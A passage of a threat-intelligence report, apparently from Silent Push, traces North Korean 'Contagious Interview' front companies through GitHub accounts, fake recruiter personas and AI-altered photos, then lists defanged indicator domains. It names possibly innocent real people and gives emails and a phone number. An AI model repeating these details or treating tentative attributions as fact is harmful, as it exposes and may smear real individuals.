Our team recently confirmed that Hades255 is connected to the fake account of the CTO of BlockNovas, based on a February 13, 2025, LinkedIn post announcing a project that was worked on, which linked to a “Hades255/varinder-instanavigation-laravel” repository on GitHub. Update: The screenshot connecting the two has been removed for privacy reasons, as the images were stolen from a real individual.
The “hades255” GitHub account made its first contributions in 2015. During the first 2 years of the account, it was merely committing on specific days to spell out “HADES” in the contribution graph. It is possible that it was a purchased account, as this is something occasionally done to make aged accounts more attractive for sale.
hxxps://github[.]com/hades255
Our team also found that the GitHub profile Hades255 not only follows BlockNovas LLC, but also follows SoftGlide LLC.
Update: A screenshot connecting the two has been removed for privacy reasons as the\r\nimages were stolen from a real individual.\r\nhxxps://github[.]com/orgs/SoftGlide-LLC/followers\r\nFurther, when checking the Hades255 repository named “portfolio-new,” we discovered a picture previously used\r\nby “Luis Carlos” on LinkedIn, who BlockNovas LLC employs.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 62 of 71\n\nHades255’s update for “Luis Carlos”\r\nLuis Carlos is a person we have seen working for BlockNovas LLC on LinkedIn:\r\nLinkedIn profile: linkedin[.]com/in/luis-lopeznoguera-colombia/en of BlockNovas LLC employee\r\nLuis Carlos\r\nOur researchers found that Luis Carlos also added stars four times to a project of Hades255, indicating a\r\nrelationship between the two users. Carlos is possibly one of the real people working for BlockNovas without\r\nrealizing his coworkers are North Koreans. Or it could be just a fake persona. His LinkedIn username is “luis-https://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 63 of 71\n\nlopeznoguera-colombia,” which is quite specific and differs from the other personas. However, the account is also\r\ncurrently “404ing” on LinkedIn, which means it has either been deleted or banned.\r\nhxxps://github[.]com/lopezluis00\r\nOne member named “thegoodearth918” (github[.]com/thegoodearth918) was found within the GitHub account\r\nfor “SoftGlide LLC” (github[.]com/SoftGlide-LLC) within their GitHub. 
What is interesting is that, again, we see\r\n“918” at the end of the username, just as we saw with bigrocks918.\r\nhxxps://github[.]com/thegoodearth918\r\nThe user “thegoodearth918” (github[.]com/thegoodearth918) also forked a repository named “Linkedin-skillassessments-quizzes” in August 2023 from another user, potentially using this to develop future skill\r\nassessment apps for Contagious Interview lures with job applicants.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 64 of 71\n\nhxxps://github[.]com/thegoodearth918\r\nAnother project from thegoodearth918 named “create-aviation” includes a “bigrocks.js” file which has the email\r\naddress bigrocks89@outlook[.]com by another GitHub account named Big-Rocks, which is now deleted. Big-Rocks is most likely the older account from bigrocks918 and thegoodearth918. The screenshot below reveals the\r\nemail bigrocks89@outlook[.]com:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 65 of 71\n\nhxxps://github[.]com/thegoodearth918/create-aviation/js/bigrocks.js\r\nThe email address “tsumin.work@gmail[.]com” was found within the thegoodearth918 GitHub profile. It’s\r\nunclear if this email is connected to Contagious Interview.\r\nCommit relationship between bigrocks918 and thegoodearth918 including\r\ntsumin.work@gmail[.]com\r\nBlockNovas Recruiter Alexander Nolan: A Known Fake\r\nWe found a site, “crypto[.]jobs,” mentioning BlockNovas LLC with a recruiter named Alexander Nolan.\r\nhxxps://crypto[.]jobs/companies/blocknovas-llc-1\r\nThe same profile can be seen on intch[.]org:\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 66 of 71\n\nFake persona of Alexander Nolan on intch[.]org/14338697\r\nOur threat analysts believe “Alexander Nolan” is a fake persona impersonating the CEO of “TeachMe[.]To”\r\nnamed Tyler Maloney, who was interviewed by Business Insider in 2024 about his startup. 
The image in the\r\narticle is nearly identical to the one used on the recruiter pages.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 67 of 71\n\nWhat’s odd about this “Alexander Nolan” persona is that the images are slightly different—the first image below\r\nwas the image found on LinkedIn and used in the Business Insider article. The second image appears to be either\r\nfrom a unique source or an AI-generated image using the first as its base.\r\nReal image of Tyler Maloney found on Business Insider, LinkedIn\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 68 of 71\n\nImage used by Contagious Interview persona and BlockNovas recruiter of “Alexander Nolan”\r\n“Individual A”: Likely Fake BlockNovas Developer\r\n“Individual A” states that the account is run the Chief Technology Officer of BlockNovas. However, there is\r\nevidence that the photos have been generated using AI via Remaker[.]ai. Update: The screenshot and name\r\nconnecting the two has been removed for privacy reasons as the images were stolen from a real individual,\r\nthen altered using AI.\r\nWhen expanded, the individual’s LinkedIn profile says, “Remaker AI Headshot” in the bottom left corner of the\r\nimage, which refers to the software Remaker[.]ai.\r\nRemaker AI is a tool that enables you to upload one photo or a series of photos of a real person and generate an\r\nunlimited number of AI-generated photos of that persona in a wide range of scenarios.\r\nUsing the tool aligns with questions we had about a similar face seen repeatedly with the “Mehmet Demir”\r\npersona in different scenarios—the same tool or a similar tool was likely used to create the images.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 69 of 71\n\nAI-generated image examples on remaker[.]ai\r\n“Individual A” also created a CV on the site vercel[.]app, which is commonly used by North Korean APTs to set\r\nup fake resumes for the 
personas they use to conduct their sophisticated campaigns. The site revealed an email\r\naddress “gabriel.dev9725@gmail[.]com” and phone number +558195833202. Update: The screenshot\r\nconnecting the two has been removed for privacy reasons as the images were stolen from a real individual.\r\nSilent Push Threat Analysts found a recent post from Lima on LinkedIn and noticed something was off about the\r\npicture. In this instance, Lima looks different in the post compared to the CV and LinkedIn profile picture. The\r\nhands also look off. Update: The screenshot connecting the two has been removed for privacy reasons as the\r\nimages were stolen from a real individual, then altered using AI.\r\nContinuing to Track North Korean Threat Actors “Contagious Interview”\r\nCampaigns\r\nSilent Push Threat Analysts are continuing to track the Contagious Interview threat actors. We believe they pose a\r\nthreat to individuals and provide some corporate risk due to the malware they deploy and the credentials they\r\nacquire from devices.\r\nMitigation\r\nOur analysts have developed a series of Silent Push Indicators Of Future AttackTM (IOFA\r\nTM) Feeds for these\r\ntypes of malicious campaign efforts.\r\nSilent Push IOFA\r\nTM Feeds are available as part of an Enterprise subscription. 
As a result, enterprise users can\r\ningest IOFA\r\nTM Feed data into their security stack to inform their detection protocols or use it to pivot across\r\nattacker infrastructure using the Silent Push Console and Feed Analytics screen.\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 70 of 71\n\nSilent Push Community Edition is a free threat-hunting and cyber defense platform featuring a range of advanced\r\noffensive and defensive lookups, web content queries, and enriched data types, including Silent Push Web Scanner\r\nand Live Scan.\r\nClick here to sign up for a free account.\r\nSample Contagious Interview IOFA\r\nTM List\r\nangeloper[.]com\r\nangeloperonline[.]online\r\napply-blocknovas[.]site\r\nattisscmo[.]com\r\nbigrocks918[.]com\r\nblocknovas[.]com\r\ncamdriversupport[.]com\r\ndrive-release[.]cloud\r\neasydriver[.]cloud\r\ninsomnianwin[.]site\r\nlianxinxiao[.]com\r\nSoftglide[.]co\r\nwonthegame[.]site\r\nxn--12c5eglc5bd7i[.]site\r\nSource: https://www.silentpush.com/blog/contagious-interview-front-companies/\r\nhttps://www.silentpush.com/blog/contagious-interview-front-companies/\r\nPage 71 of 71",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.silentpush.com/blog/contagious-interview-front-companies/"
	],
	"report_names": [
		"contagious-interview-front-companies"
	],
	"threat_actors": [
		{
			"id": "8670f370-1865-4264-9a1b-0dfe7617c329",
			"created_at": "2022-10-25T16:07:23.69953Z",
			"updated_at": "2026-04-10T02:00:04.716126Z",
			"deleted_at": null,
			"main_name": "Hades",
			"aliases": [
				"Operation TrickyMouse"
			],
			"source_name": "ETDA:Hades",
			"tools": [
				"Brave Prince",
				"Gold Dragon",
				"GoldDragon",
				"Lovexxx",
				"Olympic Destroyer",
				"Running RAT",
				"RunningRAT",
				"SOURGRAPE",
				"running_rat"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "7187a642-699d-44b2-9c69-498c80bce81f",
			"created_at": "2025-08-07T02:03:25.105688Z",
			"updated_at": "2026-04-10T02:00:03.78394Z",
			"deleted_at": null,
			"main_name": "NICKEL TAPESTRY",
			"aliases": [
				"CL-STA-0237 ",
				"CL-STA-0241 ",
				"DPRK IT Workers",
				"Famous Chollima ",
				"Jasper Sleet Microsoft",
				"Purpledelta Recorded Future",
				"Storm-0287 ",
				"UNC5267 ",
				"Wagemole "
			],
			"source_name": "Secureworks:NICKEL TAPESTRY",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d05e8567-9517-4bd8-a952-5e8d66f68923",
			"created_at": "2024-11-13T13:15:31.114471Z",
			"updated_at": "2026-04-10T02:00:03.761535Z",
			"deleted_at": null,
			"main_name": "WageMole",
			"aliases": [
				"Void Dokkaebi",
				"WaterPlum",
				"PurpleBravo",
				"Famous Chollima",
				"UNC5267",
				"Wagemole",
				"Nickel Tapestry",
				"Storm-1877"
			],
			"source_name": "MISPGALAXY:WageMole",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434062,
	"ts_updated_at": 1775826769,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0584b033a3b4ad06fdf8a1b26249314ffda17a60.pdf",
		"text": "https://archive.orkl.eu/0584b033a3b4ad06fdf8a1b26249314ffda17a60.txt",
		"img": "https://archive.orkl.eu/0584b033a3b4ad06fdf8a1b26249314ffda17a60.jpg"
	}
}